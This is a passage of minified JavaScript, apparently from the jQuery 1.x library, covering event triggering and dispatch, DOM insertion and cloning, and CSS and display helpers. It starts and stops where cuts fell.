f,g,h,i,k,l,m,o=[d||z],p=j.call(b,"type")?b.type:b,q=j.call(b,"namespace")?b.namespace.split("."):[];if(h=l=d=d||z,3!==d.nodeType&&8!==d.nodeType&&!_.test(p+n.event.triggered)&&(p.indexOf(".")>=0&&(q=p.split("."),p=q.shift(),q.sort()),g=p.indexOf(":")<0&&"on"+p,b=b[n.expando]?b:new n.Event(p,"object"==typeof b&&b),b.isTrigger=e?2:3,b.namespace=q.join("."),b.namespace_re=b.namespace?new RegExp("(^|\\.)"+q.join("\\.(?:.*\\.|)")+"(\\.|$)"):null,b.result=void 0,b.target||(b.target=d),c=null==c?[b]:n.makeArray(c,[b]),k=n.event.special[p]||{},e||!k.trigger||k.trigger.apply(d,c)!==!1)){if(!e&&!k.noBubble&&!n.isWindow(d)){for(i=k.delegateType||p,_.test(i+p)||(h=h.parentNode);h;h=h.parentNode)o.push(h),l=h;l===(d.ownerDocument||z)&&o.push(l.defaultView||l.parentWindow||a)}m=0;while((h=o[m++])&&!b.isPropagationStopped())b.type=m>1?i:k.bindType||p,f=(n._data(h,"events")||{})[b.type]&&n._data(h,"handle"),f&&f.apply(h,c),f=g&&h[g],f&&f.apply&&n.acceptData(h)&&(b.result=f.apply(h,c),b.result===!1&&b.preventDefault());if(b.type=p,!e&&!b.isDefaultPrevented()&&(!k._default||k._default.apply(o.pop(),c)===!1)&&n.acceptData(d)&&g&&d[p]&&!n.isWindow(d)){l=d[g],l&&(d[g]=null),n.event.triggered=p;try{d[p]()}catch(r){}n.event.triggered=void 0,l&&(d[g]=l)}return b.result}},dispatch:function(a){a=n.event.fix(a);var b,c,e,f,g,h=[],i=d.call(arguments),j=(n._data(this,"events")||{})[a.type]||[],k=n.event.special[a.type]||{};if(i[0]=a,a.delegateTarget=this,!k.preDispatch||k.preDispatch.call(this,a)!==!1){h=n.event.handlers.call(this,a,j),b=0;while((f=h[b++])&&!a.isPropagationStopped()){a.currentTarget=f.elem,g=0;while((e=f.handlers[g++])&&!a.isImmediatePropagationStopped())(!a.namespace_re||a.namespace_re.test(e.namespace))&&(a.handleObj=e,a.data=e.data,c=((n.event.special[e.origType]||{}).handle||e.handler).apply(f.elem,i),void 0!==c&&(a.result=c)===!1&&(a.preventDefault(),a.stopPropagation()))}return k.postDispatch&&k.postDispatch.call(this,a),a.result}},handlers:function(a,b){var c,d,e,f,g=[],h=b.delegateCount,i=a.target;if(h&&i.nodeType&&(!a.button||"click"!==a.type))for(;i!=this;i=i.parentNode||this)if(1===i.nodeType&&(i.disabled!==!0||"click"!==a.type)){for(e=[],f=0;h>f;f++)d=b[f],c=d.selector+" ",void 0===e[c]&&(e[c]=d.needsContext?n(c,this).index(i)>=0:n.find(c,this,null,[i]).length),e[c]&&e.push(d);e.length&&g.push({elem:i,handlers:e})}return h<b.length&&g.push({elem:this,handlers:b.slice(h)}),g},fix:function(a){if(a[n.expando])return a;var b,c,d,e=a.type,f=a,g=this.fixHooks[e];g||(this.fixHooks[e]=g=$.test(e)?this.mouseHooks:Z.test(e)?this.keyHooks:{}),d=g.props?this.props.concat(g.props):this.props,a=new n.Event(f),b=d.length;while(b--)c=d[b],a[c]=f[c];return a.target||(a.target=f.srcElement||z),3===a.target.nodeType&&(a.target=a.target.parentNode),a.metaKey=!!a.metaKey,g.filter?g.filter(a,f):a},props:"altKey bubbles cancelable ctrlKey currentTarget eventPhase metaKey relatedTarget shiftKey target timeStamp view which".split(" "),fixHooks:{},keyHooks:{props:"char charCode key keyCode".split(" "),filter:function(a,b){return null==a.which&&(a.which=null!=b.charCode?b.charCode:b.keyCode),a}},mouseHooks:{props:"button buttons clientX clientY fromElement offsetX offsetY pageX pageY screenX screenY toElement".split(" "),filter:function(a,b){var c,d,e,f=b.button,g=b.fromElement;return null==a.pageX&&null!=b.clientX&&(d=a.target.ownerDocument||z,e=d.documentElement,c=d.body,a.pageX=b.clientX+(e&&e.scrollLeft||c&&c.scrollLeft||0)-(e&&e.clientLeft||c&&c.clientLeft||0),a.pageY=b.clientY+(e&&e.scrollTop||c&&c.scrollTop||0)-(e&&e.clientTop||c&&c.clientTop||0)),!a.relatedTarget&&g&&(a.relatedTarget=g===a.target?b.toElement:g),a.which||void 0===f||(a.which=1&f?1:2&f?3:4&f?2:0),a}},special:{load:{noBubble:!0},focus:{trigger:function(){if(this!==db()&&this.focus)try{return this.focus(),!1}catch(a){}},delegateType:"focusin"},blur:{trigger:function(){return this===db()&&this.blur?(this.blur(),!1):void 0},delegateType:"focusout"},click:{trigger:function(){return n.nodeName(this,"input")&&"checkbox"===this.type&&this.click?(this.click(),!1):void 0},_default:function(a){return n.nodeName(a.target,"a")}},beforeunload:{postDispatch:function(a){void 0!==a.result&&(a.originalEvent.returnValue=a.result)}}},simulate:function(a,b,c,d){var e=n.extend(new n.Event,c,{type:a,isSimulated:!0,originalEvent:{}});d?n.event.trigger(e,null,b):n.event.dispatch.call(b,e),e.isDefaultPrevented()&&c.preventDefault()}},n.removeEvent=z.removeEventListener?function(a,b,c){a.removeEventListener&&a.removeEventListener(b,c,!1)}:function(a,b,c){var d="on"+b;a.detachEvent&&(typeof a[d]===L&&(a[d]=null),a.detachEvent(d,c))},n.Event=function(a,b){return this instanceof n.Event?(a&&a.type?(this.originalEvent=a,this.type=a.type,this.isDefaultPrevented=a.defaultPrevented||void 0===a.defaultPrevented&&(a.returnValue===!1||a.getPreventDefault&&a.getPreventDefault())?bb:cb):this.type=a,b&&n.extend(this,b),this.timeStamp=a&&a.timeStamp||n.now(),void(this[n.expando]=!0)):new n.Event(a,b)},n.Event.prototype={isDefaultPrevented:cb,isPropagationStopped:cb,isImmediatePropagationStopped:cb,preventDefault:function(){var a=this.originalEvent;this.isDefaultPrevented=bb,a&&(a.preventDefault?a.preventDefault():a.returnValue=!1)},stopPropagation:function(){var a=this.originalEvent;this.isPropagationStopped=bb,a&&(a.stopPropagation&&a.stopPropagation(),a.cancelBubble=!0)},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=bb,this.stopPropagation()}},n.each({mouseenter:"mouseover",mouseleave:"mouseout"},function(a,b){n.event.special[a]={delegateType:b,bindType:b,handle:function(a){var c,d=this,e=a.relatedTarget,f=a.handleObj;return(!e||e!==d&&!n.contains(d,e))&&(a.type=f.origType,c=f.handler.apply(this,arguments),a.type=b),c}}}),l.submitBubbles||(n.event.special.submit={setup:function(){return n.nodeName(this,"form")?!1:void n.event.add(this,"click._submit keypress._submit",function(a){var b=a.target,c=n.nodeName(b,"input")||n.nodeName(b,"button")?b.form:void 0;c&&!n._data(c,"submitBubbles")&&(n.event.add(c,"submit._submit",function(a){a._submit_bubble=!0}),n._data(c,"submitBubbles",!0))})},postDispatch:function(a){a._submit_bubble&&(delete a._submit_bubble,this.parentNode&&!a.isTrigger&&n.event.simulate("submit",this.parentNode,a,!0))},teardown:function(){return n.nodeName(this,"form")?!1:void n.event.remove(this,"._submit")}}),l.changeBubbles||(n.event.special.change={setup:function(){return Y.test(this.nodeName)?(("checkbox"===this.type||"radio"===this.type)&&(n.event.add(this,"propertychange._change",function(a){"checked"===a.originalEvent.propertyName&&(this._just_changed=!0)}),n.event.add(this,"click._change",function(a){this._just_changed&&!a.isTrigger&&(this._just_changed=!1),n.event.simulate("change",this,a,!0)})),!1):void n.event.add(this,"beforeactivate._change",function(a){var b=a.target;Y.test(b.nodeName)&&!n._data(b,"changeBubbles")&&(n.event.add(b,"change._change",function(a){!this.parentNode||a.isSimulated||a.isTrigger||n.event.simulate("change",this.parentNode,a,!0)}),n._data(b,"changeBubbles",!0))})},handle:function(a){var b=a.target;return this!==b||a.isSimulated||a.isTrigger||"radio"!==b.type&&"checkbox"!==b.type?a.handleObj.handler.apply(this,arguments):void 0},teardown:function(){return n.event.remove(this,"._change"),!Y.test(this.nodeName)}}),l.focusinBubbles||n.each({focus:"focusin",blur:"focusout"},function(a,b){var c=function(a){n.event.simulate(b,a.target,n.event.fix(a),!0)};n.event.special[b]={setup:function(){var d=this.ownerDocument||this,e=n._data(d,b);e||d.addEventListener(a,c,!0),n._data(d,b,(e||0)+1)},teardown:function(){var d=this.ownerDocument||this,e=n._data(d,b)-1;e?n._data(d,b,e):(d.removeEventListener(a,c,!0),n._removeData(d,b))}}}),n.fn.extend({on:function(a,b,c,d,e){var f,g;if("object"==typeof a){"string"!=typeof b&&(c=c||b,b=void 0);for(f in a)this.on(f,b,c,a[f],e);return this}if(null==c&&null==d?(d=b,c=b=void 0):null==d&&("string"==typeof b?(d=c,c=void 0):(d=c,c=b,b=void 0)),d===!1)d=cb;else if(!d)return this;return 1===e&&(g=d,d=function(a){return n().off(a),g.apply(this,arguments)},d.guid=g.guid||(g.guid=n.guid++)),this.each(function(){n.event.add(this,a,d,c,b)})},one:function(a,b,c,d){return this.on(a,b,c,d,1)},off:function(a,b,c){var d,e;if(a&&a.preventDefault&&a.handleObj)return d=a.handleObj,n(a.delegateTarget).off(d.namespace?d.origType+"."+d.namespace:d.origType,d.selector,d.handler),this;if("object"==typeof a){for(e in a)this.off(e,b,a[e]);return this}return(b===!1||"function"==typeof b)&&(c=b,b=void 0),c===!1&&(c=cb),this.each(function(){n.event.remove(this,a,c,b)})},trigger:function(a,b){return this.each(function(){n.event.trigger(a,b,this)})},triggerHandler:function(a,b){var c=this[0];return c?n.event.trigger(a,b,c,!0):void 0}});function eb(a){var b=fb.split("|"),c=a.createDocumentFragment();if(c.createElement)while(b.length)c.createElement(b.pop());return c}var fb="abbr|article|aside|audio|bdi|canvas|data|datalist|details|figcaption|figure|footer|header|hgroup|mark|meter|nav|output|progress|section|summary|time|video",gb=/ jQuery\d+="(?:null|\d+)"/g,hb=new RegExp("<(?:"+fb+")[\\s/>]","i"),ib=/^\s+/,jb=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,kb=/<([\w:]+)/,lb=/<tbody/i,mb=/<|&#?\w+;/,nb=/<(?:script|style|link)/i,ob=/checked\s*(?:[^=]|=\s*.checked.)/i,pb=/^$|\/(?:java|ecma)script/i,qb=/^true\/(.*)/,rb=/^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g,sb={option:[1,"<select multiple='multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],area:[1,"<map>","</map>"],param:[1,"<object>","</object>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],col:[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],_default:l.htmlSerialize?[0,"",""]:[1,"X<div>","</div>"]},tb=eb(z),ub=tb.appendChild(z.createElement("div"));sb.optgroup=sb.option,sb.tbody=sb.tfoot=sb.colgroup=sb.caption=sb.thead,sb.th=sb.td;function vb(a,b){var c,d,e=0,f=typeof a.getElementsByTagName!==L?a.getElementsByTagName(b||"*"):typeof a.querySelectorAll!==L?a.querySelectorAll(b||"*"):void 0;if(!f)for(f=[],c=a.childNodes||a;null!=(d=c[e]);e++)!b||n.nodeName(d,b)?f.push(d):n.merge(f,vb(d,b));return void 0===b||b&&n.nodeName(a,b)?n.merge([a],f):f}function wb(a){X.test(a.type)&&(a.defaultChecked=a.checked)}function xb(a,b){return n.nodeName(a,"table")&&n.nodeName(11!==b.nodeType?b:b.firstChild,"tr")?a.getElementsByTagName("tbody")[0]||a.appendChild(a.ownerDocument.createElement("tbody")):a}function yb(a){return a.type=(null!==n.find.attr(a,"type"))+"/"+a.type,a}function zb(a){var b=qb.exec(a.type);return b?a.type=b[1]:a.removeAttribute("type"),a}function Ab(a,b){for(var c,d=0;null!=(c=a[d]);d++)n._data(c,"globalEval",!b||n._data(b[d],"globalEval"))}function Bb(a,b){if(1===b.nodeType&&n.hasData(a)){var c,d,e,f=n._data(a),g=n._data(b,f),h=f.events;if(h){delete g.handle,g.events={};for(c in h)for(d=0,e=h[c].length;e>d;d++)n.event.add(b,c,h[c][d])}g.data&&(g.data=n.extend({},g.data))}}function Cb(a,b){var c,d,e;if(1===b.nodeType){if(c=b.nodeName.toLowerCase(),!l.noCloneEvent&&b[n.expando]){e=n._data(b);for(d in e.events)n.removeEvent(b,d,e.handle);b.removeAttribute(n.expando)}"script"===c&&b.text!==a.text?(yb(b).text=a.text,zb(b)):"object"===c?(b.parentNode&&(b.outerHTML=a.outerHTML),l.html5Clone&&a.innerHTML&&!n.trim(b.innerHTML)&&(b.innerHTML=a.innerHTML)):"input"===c&&X.test(a.type)?(b.defaultChecked=b.checked=a.checked,b.value!==a.value&&(b.value=a.value)):"option"===c?b.defaultSelected=b.selected=a.defaultSelected:("input"===c||"textarea"===c)&&(b.defaultValue=a.defaultValue)}}n.extend({clone:function(a,b,c){var d,e,f,g,h,i=n.contains(a.ownerDocument,a);if(l.html5Clone||n.isXMLDoc(a)||!hb.test("<"+a.nodeName+">")?f=a.cloneNode(!0):(ub.innerHTML=a.outerHTML,ub.removeChild(f=ub.firstChild)),!(l.noCloneEvent&&l.noCloneChecked||1!==a.nodeType&&11!==a.nodeType||n.isXMLDoc(a)))for(d=vb(f),h=vb(a),g=0;null!=(e=h[g]);++g)d[g]&&Cb(e,d[g]);if(b)if(c)for(h=h||vb(a),d=d||vb(f),g=0;null!=(e=h[g]);g++)Bb(e,d[g]);else Bb(a,f);return d=vb(f,"script"),d.length>0&&Ab(d,!i&&vb(a,"script")),d=h=e=null,f},buildFragment:function(a,b,c,d){for(var e,f,g,h,i,j,k,m=a.length,o=eb(b),p=[],q=0;m>q;q++)if(f=a[q],f||0===f)if("object"===n.type(f))n.merge(p,f.nodeType?[f]:f);else if(mb.test(f)){h=h||o.appendChild(b.createElement("div")),i=(kb.exec(f)||["",""])[1].toLowerCase(),k=sb[i]||sb._default,h.innerHTML=k[1]+f.replace(jb,"<$1></$2>")+k[2],e=k[0];while(e--)h=h.lastChild;if(!l.leadingWhitespace&&ib.test(f)&&p.push(b.createTextNode(ib.exec(f)[0])),!l.tbody){f="table"!==i||lb.test(f)?"<table>"!==k[1]||lb.test(f)?0:h:h.firstChild,e=f&&f.childNodes.length;while(e--)n.nodeName(j=f.childNodes[e],"tbody")&&!j.childNodes.length&&f.removeChild(j)}n.merge(p,h.childNodes),h.textContent="";while(h.firstChild)h.removeChild(h.firstChild);h=o.lastChild}else p.push(b.createTextNode(f));h&&o.removeChild(h),l.appendChecked||n.grep(vb(p,"input"),wb),q=0;while(f=p[q++])if((!d||-1===n.inArray(f,d))&&(g=n.contains(f.ownerDocument,f),h=vb(o.appendChild(f),"script"),g&&Ab(h),c)){e=0;while(f=h[e++])pb.test(f.type||"")&&c.push(f)}return h=null,o},cleanData:function(a,b){for(var d,e,f,g,h=0,i=n.expando,j=n.cache,k=l.deleteExpando,m=n.event.special;null!=(d=a[h]);h++)if((b||n.acceptData(d))&&(f=d[i],g=f&&j[f])){if(g.events)for(e in g.events)m[e]?n.event.remove(d,e):n.removeEvent(d,e,g.handle);j[f]&&(delete j[f],k?delete d[i]:typeof d.removeAttribute!==L?d.removeAttribute(i):d[i]=null,c.push(f))}}}),n.fn.extend({text:function(a){return W(this,function(a){return void 0===a?n.text(this):this.empty().append((this[0]&&this[0].ownerDocument||z).createTextNode(a))},null,a,arguments.length)},append:function(){return this.domManip(arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=xb(this,a);b.appendChild(a)}})},prepend:function(){return this.domManip(arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=xb(this,a);b.insertBefore(a,b.firstChild)}})},before:function(){return this.domManip(arguments,function(a){this.parentNode&&this.parentNode.insertBefore(a,this)})},after:function(){return this.domManip(arguments,function(a){this.parentNode&&this.parentNode.insertBefore(a,this.nextSibling)})},remove:function(a,b){for(var c,d=a?n.filter(a,this):this,e=0;null!=(c=d[e]);e++)b||1!==c.nodeType||n.cleanData(vb(c)),c.parentNode&&(b&&n.contains(c.ownerDocument,c)&&Ab(vb(c,"script")),c.parentNode.removeChild(c));return this},empty:function(){for(var a,b=0;null!=(a=this[b]);b++){1===a.nodeType&&n.cleanData(vb(a,!1));while(a.firstChild)a.removeChild(a.firstChild);a.options&&n.nodeName(a,"select")&&(a.options.length=0)}return this},clone:function(a,b){return a=null==a?!1:a,b=null==b?a:b,this.map(function(){return n.clone(this,a,b)})},html:function(a){return W(this,function(a){var b=this[0]||{},c=0,d=this.length;if(void 0===a)return 1===b.nodeType?b.innerHTML.replace(gb,""):void 0;if(!("string"!=typeof a||nb.test(a)||!l.htmlSerialize&&hb.test(a)||!l.leadingWhitespace&&ib.test(a)||sb[(kb.exec(a)||["",""])[1].toLowerCase()])){a=a.replace(jb,"<$1></$2>");try{for(;d>c;c++)b=this[c]||{},1===b.nodeType&&(n.cleanData(vb(b,!1)),b.innerHTML=a);b=0}catch(e){}}b&&this.empty().append(a)},null,a,arguments.length)},replaceWith:function(){var a=arguments[0];return this.domManip(arguments,function(b){a=this.parentNode,n.cleanData(vb(this)),a&&a.replaceChild(b,this)}),a&&(a.length||a.nodeType)?this:this.remove()},detach:function(a){return this.remove(a,!0)},domManip:function(a,b){a=e.apply([],a);var c,d,f,g,h,i,j=0,k=this.length,m=this,o=k-1,p=a[0],q=n.isFunction(p);if(q||k>1&&"string"==typeof p&&!l.checkClone&&ob.test(p))return this.each(function(c){var d=m.eq(c);q&&(a[0]=p.call(this,c,d.html())),d.domManip(a,b)});if(k&&(i=n.buildFragment(a,this[0].ownerDocument,!1,this),c=i.firstChild,1===i.childNodes.length&&(i=c),c)){for(g=n.map(vb(i,"script"),yb),f=g.length;k>j;j++)d=i,j!==o&&(d=n.clone(d,!0,!0),f&&n.merge(g,vb(d,"script"))),b.call(this[j],d,j);if(f)for(h=g[g.length-1].ownerDocument,n.map(g,zb),j=0;f>j;j++)d=g[j],pb.test(d.type||"")&&!n._data(d,"globalEval")&&n.contains(h,d)&&(d.src?n._evalUrl&&n._evalUrl(d.src):n.globalEval((d.text||d.textContent||d.innerHTML||"").replace(rb,"")));i=c=null}return this}}),n.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(a,b){n.fn[a]=function(a){for(var c,d=0,e=[],g=n(a),h=g.length-1;h>=d;d++)c=d===h?this:this.clone(!0),n(g[d])[b](c),f.apply(e,c.get());return this.pushStack(e)}});var Db,Eb={};function Fb(b,c){var d=n(c.createElement(b)).appendTo(c.body),e=a.getDefaultComputedStyle?a.getDefaultComputedStyle(d[0]).display:n.css(d[0],"display");return d.detach(),e}function Gb(a){var b=z,c=Eb[a];return c||(c=Fb(a,b),"none"!==c&&c||(Db=(Db||n("<iframe frameborder='0' width='0' height='0'/>")).appendTo(b.documentElement),b=(Db[0].contentWindow||Db[0].contentDocument).document,b.write(),b.close(),c=Fb(a,b),Db.detach()),Eb[a]=c),c}!function(){var a,b,c=z.createElement("div"),d="-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;display:block;padding:0;margin:0;border:0";c.innerHTML="  <link/><table></table><a href='/a'>a</a><input type='checkbox'/>",a=c.getElementsByTagName("a")[0],a.style.cssText="float:left;opacity:.5",l.opacity=/^0.5/.test(a.style.opacity),l.cssFloat=!!a.style.cssFloat,c.style.backgroundClip="content-box",c.cloneNode(!0).style.backgroundClip="",l.clearCloneStyle="content-box"===c.style.backgroundClip,a=c=null,l.shrinkWrapBlocks=function(){var a,c,e,f;if(null==b){if(a=z.getElementsByTagName("body")[0],!a)return;f="border:0;width:0;height:0;position:absolute;top:0;left:-9999px",c=z.createElement("div"),e=z.createElement("div"),a.appendChild(c).appendChild(e),b=!1,typeof e.style.zoom!==L&&(e.style.cssText=d+";width:1px;padding:1px;zoom:1",e.innerHTML="<div></div>",e.firstChild.style.width="5px",b=3!==e.offsetWidth),a.removeChild(c),a=c=e=null}return b}}();var Hb=/^margin/,Ib=new RegExp("^("+T+")(?!px)[a-z%]+$","i"),Jb,Kb,Lb=/^(top|right|bottom|left)$/;a.getComputedStyle?(Jb=function(a){return a.ownerDocument.defaultView.getComputedStyle(a,null)},Kb=function(a,b,c){var d,e,f,g,h=a.style;return c=c||Jb(a),g=c?c.getPropertyValue(b)||c[b]:void 0,c&&(""!==g||n.contains(a.ownerDocument,a)||(g=n.style(a,b)),Ib.test(g)&&Hb.test(b)&&(d=h.width,e=h.minWidth,f=h.maxWidth,h.minWidth=h.maxWidth=h.width=g,g=c.width,h.width=d,h.minWidth=e,h.maxWidth=f)),void 0===g?g:g+""}):z.documentElement.currentStyle&&(Jb=function(a){return a.currentStyle},Kb=function(a,b,c){var d,e,f,g,h=a.style;return c=c||Jb(a),g=c?c[b]:void 0,null==g&&h&&h[b]&&(g=h[b]),Ib.test(g)&&!Lb.test(b)&&(d=h.left,e=a.runtimeStyle,f=e&&e.left,f&&(e.left=a.currentStyle.left),h.left="fontSize"===b?"1em":g,g=h.pixelLeft+"px",h.left=d,f&&(e.left=f)),void 0===g?g:g+""||"auto"});function Mb(a,b){return{get:function(){var c=a();if(null!=c)return c?void delete this.get:(this.get=b).apply(this,arguments)}}}!function(){var b,c,d,e,f,g,h=z.createElement("div"),i="border:0;width:0;height:0;position:absolute;top:0;left:-9999px",j="-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;display:block;padding:0;margin:0;border:0";h.innerHTML="  <link/><table></table><a href='/a'>a</a><input type='checkbox'/>",b=h.getElementsByTagName("a")[0],b.style.cssText="float:left;opacity:.5",l.opacity=/^0.5/.test(b.style.opacity),l.cssFloat=!!b.style.cssFloat,h.style.backgroundClip="content-box",h.cloneNode(!0).style.backgroundClip="",l.clearCloneStyle="content-box"===h.style.backgroundClip,b=h=null,n.extend(l,{reliableHiddenOffsets:function(){if(null!=c)return c;var a,b,d,e=z.createElement("div"),f=z.getElementsByTagName("body")[0];if(f)return e.setAttribute("className","t"),e.innerHTML="  <link/><table></table><a href='/a'>a</a><input type='checkbox'/>",a=z.createElement("div"),a.style.cssText=i,f.appendChild(a).appendChild(e),e.innerHTML="<table><tr><td></td><td>t</td></tr></table>",b=e.getElementsByTagName("td"),b[0].style.cssText="padding:0;margin:0;border:0;display:none",d=0===b[0].offsetHeight,b[0].style.display="",b[1].style.display="none",c=d&&0===b[0].offsetHeight,f.removeChild(a),e=f=null,c},boxSizing:function(){return null==d&&k(),d},boxSizingReliable:function(){return null==e&&k(),e},pixelPosition:function(){return null==f&&k(),f},reliableMarginRight:function(){var b,c,d,e;if(null==g&&a.getComputedStyle){if(b=z.getElementsByTagName("body")[0],!b)return;c=z.createElement("div"),d=z.createElement("div"),c.style.cssText=i,b.appendChild(c).appendChild(d),e=d.appendChild(z.createElement("div")),e.style.cssText=d.style.cssText=j,e.style.marginRight=e.style.width="0",d.style.width="1px",g=!parseFloat((a.getComputedStyle(e,null)||{}).marginRight),b.removeChild(c)}return g}});function k(){var b,c,h=z.getElementsByTagName("body")[0];h&&(b=z.createElement("div"),c=z.createElement("div"),b.style.cssText=i,h.appendChild(b).appendChild(c),c.style.cssText="-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;position:absolute;display:block;padding:1px;border:1px;width:4px;margin-top:1%;top:1%",n.swap(h,null!=h.style.zoom?{zoom:1}:{},function(){d=4===c.offsetWidth}),e=!0,f=!1,g=!0,a.getComputedStyle&&(f="1%"!==(a.getComputedStyle(c,null)||{}).top,e="4px"===(a.getComputedStyle(c,null)||{width:"4px"}).width),h.removeChild(b),c=h=null)}}(),n.swap=function(a,b,c,d){var e,f,g={};for(f in b)g[f]=a.style[f],a.style[f]=b[f];e=c.apply(a,d||[]);for(f in b)a.style[f]=g[f];return e};var Nb=/alpha\([^)]*\)/i,Ob=/opacity\s*=\s*([^)]*)/,Pb=/^(none|table(?!-c[ea]).+)/,Qb=new RegExp("^("+T+")(.*)$","i"),Rb=new RegExp("^([+-])=("+T+")","i"),Sb={position:"absolute",visibility:"hidden",display:"block"},Tb={letterSpacing:0,fontWeight:400},Ub=["Webkit","O","Moz","ms"];function Vb(a,b){if(b in a)return b;var c=b.charAt(0).toUpperCase()+b.slice(1),d=b,e=Ub.length;while(e--)if(b=Ub[e]+c,b in a)return b;return d}function Wb(a,b){for(var c,d,e,f=[],g=0,h=a.length;h>g;g++)d=a[g],d.style&&(f[g]=n._data(d,"olddisplay"),c=d.style.display,b?(f[g]||"none"!==c||(d.style.display=""),""===d.style.display&&V(d)&&(f[g]=n._data(d,"olddisplay",Gb(d.nodeName)))):f[g]||(e=V(d),(c&&"none"!==c||!e)&&n._data(d,"olddisplay",e?c:n.css(d,"display"))));for(g=0;h>g;g++)d=a[g],d.style&&(b&&"none"!==d.style.display&&""!==d.style.display||(d.style.display=b?f[g]||"":"none"));return a}function Xb(a,b,c){var d=Qb.exec(b);return d?Math.max(0,d[1]-(c||0))+(d[2]||"px"):b}function Yb(a,b,c,d,e){for(var f=c===(d?"border":"content")?4:"width"===b?1:0,g=0;4>f;f+=2)"margin"===c&&(g+=n.css(a,c+U[f],!0,e)),d?("content"===c&&(g-=n.css(a,"padding"+U[f],!0,e)),"margin"!==c&&(g-=n.css(a,"border"+U[f]+"Width",!0,e))):(g+=n.css(a,"padding"+U[f],!0,e),"padding"!==c&&(g+=n.css(a,"border"+U[f]+"Width",!0,e)));return g}function Zb(a,b,c){var d=!0,e="width"===b?a.offsetWidth:a.offsetHeight,f=Jb(a),g=l.boxSizing()&&"border-box"===n.css(a,"boxSizing",!1,f);if(0>=e||null==e){if(e=Kb(a,b,f),(0>e||null==e)&&(e=a.style[b]),Ib.test(e))return e;d=g&&(l.boxSizingReliable()||e===a.style[b]),e=parseFloat(e)||0}return e+Yb(a,b,c||(g?"border":"content"),d,f)+"px"}n.extend({cssHooks:{opacity:{get:function(a,b){if(b){var c=Kb(a,"opacity");return""===c?"1":c}}}},cssNumber:{columnCount:!0,fillOpacity:!0,fontWeight:!0,lineHeight:!0,opacity:!0,order:!0,orphans:!0,widows:!0,zIndex:!0,zoom:!0},cssProps:{"float":l.cssFloat?"cssFloat":"styleFloat"},style:function(a,b,c,d){if(a&&3!==a.nodeType&&8!==a.nodeType&&a.style){var e,f,g,h=n.camelCase(b),i=a.style;if(b=n.cssProps[h]||(n.cssProps[h]=Vb(i,h)),g=n.cssHooks[b]||n.cssHooks[h],void 0===c)return g&&"get"in g&&void 0!==(e=g.get(a,!1,d))?e:i[b];if(f=typeof c,"string"===f&&(e=Rb.exec(c))&&(c=(e[1]+1)*e[2]+parseFloat(n.css(a,b)),f="number"),null!=c&&c===c&&("number"!==f||n.cssNumber[h]||(c+="px"),l.clearCloneStyle||""!==c||0!==b.indexOf("background")||(i[b]="inherit"),!(g&&"set"in g&&void 0===(c=g.set(a,c,d)))))try{i[b]="",i[b]=c}catch(j){}}},css:function(a,b,c,d){var e,f,g,h=n.camelCase(b);return b=n.cssProps[h]||(n.cssProps[h]=Vb(a.style,h)),g=n.cssHooks[b]||n.cssHooks[h],g&&"get"in g&&(f=g.get(a,!0,c)),void 0===f&&(f=Kb(a,b,d)),"normal"===f&&b in Tb&&(f=Tb[b]),""===c||c?(e=parseFloat(f),c===!0||n.isNumeric(e)?e||0:f):f}}),n.each(["height","width"],function(a,b){n.cssHooks[b]={get:function(a,c,d){return c?0===a.offsetWidth&&Pb.test(n.css(a,"display"))?n.swap(a,Sb,function(){return Zb(a,b,d)}):Zb(a,b,d):void 0},set:function(a,c,d){var e=d&&Jb(a);return Xb(a,c,d?Yb(a,b,d,l.boxSizing()&&"border-box"===n.css(a,"boxSizing",!1,e),e):0)}}}),l.opacity||(n.cssHooks.opacity={get:function(a,b){return Ob.test((b&&a.currentStyle?a.currentStyle.filter:a.style.filter)||"")?.01*parseFloat(RegExp.$1)+"":b?"1":""},set:function(a,b){var c=a.style,d=a.currentStyle,e=n.isNumeric(b)?"alpha(opacity="+100*b+")":"",f=d&&d.filter||c.filter||"";c.zoom=1,(b>=1||""===b)&&""===n.trim(f.replace(Nb,""))&&c.removeAttribute&&(c.removeAttribute("filter"),""===b||d&&!d.filter)||(c.filter=Nb.test(f)?f.replace(Nb,e):f+" "+e)}}),n.cssHooks.marginRight=Mb(l.reliableMarginRight,function(a,b){return b?n.swap(a,{display:"inline-block"},Kb,[a,"marginRight"]):void 0}),n.each({margin:"",padding:"",border:"Width"},function(a,b){n.cssHooks[a+b]={expand:function(c){for(var d=0,e={},f="string"==typeof c?c.split(" "):[c];4>d;d++)e[a+U[d]+b]=f[d]||f[d-2]||f[0];return e}},Hb.test(a)||(n.cssHooks[a+b].set=Xb)}),n.fn.extend({css:function(a,b){return W(this,function(a,b,c){var d,e,f={},g=0;if(n.isArray(b)){for(d=Jb(a),e=b.length;e>g;g++)f[b[g]]=n.css(a,b[g],!1,d);return f}return void 0!==c?n.style(a,b,c):n.css(a,b)
4 | },a,b,arguments.length>1)},show:function(){return Wb(this,!0)},hide:function(){return Wb(this)},toggle:function(a){return"boolean"==typeof a?a?this.show():this.hide():this.each(function(){V(this)?n(this).show():n(this).hide()})}});function $b(a,b,c,d,e){return new $b.prototype.init(a,b,c,d,e)}n.Tween=$b,$b.prototype={constructor:$b,init:function(a,b,c,d,e,f){this.elem=a,this.prop=c,this.easing=e||"swing",this.options=b,this.start=this.now=this.cur(),this.end=d,this.unit=f||(n.cssNumber[c]?"":"px")},cur:function(){var a=$b.propHooks[this.prop];return a&&a.get?a.get(this):$b.propHooks._default.get(this)},run:function(a){var b,c=$b.propHooks[this.prop];return 